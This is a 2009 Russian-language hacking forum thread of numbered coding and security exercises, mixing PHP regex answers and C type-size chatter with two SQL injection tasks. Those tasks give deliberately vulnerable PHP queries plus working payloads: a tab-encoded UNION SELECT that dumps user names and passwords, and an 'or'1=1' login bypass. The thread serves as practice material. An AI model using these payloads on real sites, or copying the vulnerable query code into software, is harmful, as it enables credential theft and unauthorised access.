21.06.2009, 23:53
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
ну смотря в какой сисиеме 16/32/64 и что short/long не помнб что ставится по умолчанию када пишешь просто int =)
|
|
|
21.06.2009, 23:54
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами:
10139366
Репутация:
1502
|
|
int по дефолту 32-битный (в 32-битной системе и тп все меня поняли). короче, нет там переполнений)
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
21.06.2009, 23:59
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
не удержался .. скомплил .. ппц =)
хмм .. написал то же самое ручками сё норм ..
еси скопировать то выходит байда оО wtf?
бля сцук)) это не 1 а L ! =)
Последний раз редактировалось Doom123; 22.06.2009 в 00:23..
|
|
|
|
22.06.2009, 00:52
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
Пожалуйста, не пишите сюда задания на с и с++, для этого есть специальный разел. Завтра еще заданий добавлю. И обновлю фак в начале. Спасибо всем кто принимает участие! Пхп-взлом -новая тематика заданий)
|
|
|
|
22.06.2009, 02:16
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами:
10467109
Репутация:
222
|
|
Задание 010
Провести sql injection
PHP код:
<?php
$name = str_replace('/**/','','str_replace(' ','',$_GET['name']));
$query = mysql_query("select * from users where name='$name"); ?>
Код:
http://site.com/index.php?name=union%09select%091,2,CONCAT_WS(':',name,passwd),4,5,6%09from%09users/*
Последний раз редактировалось Extremal; 22.06.2009 в 02:18..
|
|
|
|
22.06.2009, 03:27
|
|
Новичок
Регистрация: 02.02.2006
Сообщений: 28
С нами:
10667697
Репутация:
54
|
|
в 6 'password'=0
в 9 точек добавить штук 250
в 11
PHP код:
function zamena($s)
{
return "0x".strtoupper(dechex($s[1]));
}
$str='
383 текст с числами 5838
635 еще текст 001 462
432текст564
';
$str = preg_replace_callback("/(\d{4})/U", "zamena", $str);
$str = preg_replace_callback("/(\d{3})/U", "zamena", $str);
echo $str;
Последний раз редактировалось SleepShadowWeb; 22.06.2009 в 04:20..
|
|
|
|
22.06.2009, 11:27
|
|
Banned
Регистрация: 14.01.2009
Сообщений: 515
С нами:
9116877
Репутация:
468
|
|
SleepShadowWeb, 9 задание не правильно сделал, остальные правильно! Молодец.
Добавил еще 3 задания.
Последний раз редактировалось Krist_ALL; 22.06.2009 в 12:27..
|
|
|
|
22.06.2009, 12:09
|
|
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
С нами:
9541766
Репутация:
2407
|
|
SleepShadowWeb, правильно 011 сделал, хотя можно было немного попроще:
PHP код:
$str='
383 текст с числами 5838
635 еще текст 001 462
432текст564
';
$str=preg_replace_callback("/(\d+)/s","replace_hex",$str);
function replace_hex($m)
{
return '0x'.strtoupper(dechex($m[1]));
}
print $str;
|
|
|
|
22.06.2009, 13:22
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
Сообщение от d_x
SleepShadowWeb, правильно 011 сделал, хотя можно было немного попроще:
PHP код:
$str='
383 текст с числами 5838
635 еще текст 001 462
432текст564
';
$str=preg_replace_callback("/(\d+)/s","replace_hex",$str);
function replace_hex($m)
{
return '0x'.strtoupper(dechex($m[1]));
}
print $str;
в регулярке модификатор s зачем? помоему и без него реплейсу живёться не дурно..
strtoupper тут зачем ? поднимаем хекс товарищи!
в колбеках с небольшой ф-ией удобно будет заюзать create_function(); вместо создания отдельной ..
Последний раз редактировалось 159932; 22.06.2009 в 13:27..
|
|
|
|
22.06.2009, 12:32
|
|
Познающий
Регистрация: 21.06.2006
Сообщений: 74
С нами:
10467109
Репутация:
222
|
|
Задание 013
Войти в панель администрирования, используя sql injection . В БД не лезть. Обмануть проверку просто.
PHP код:
PHP код:
<?php // Login.php
....
$query = "select * from admin where pass = '$_POST['pass']' and login = '$_POST['login']'";
?>
Код:
login = 'or'1=1'
pass = 'or'1=1'
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
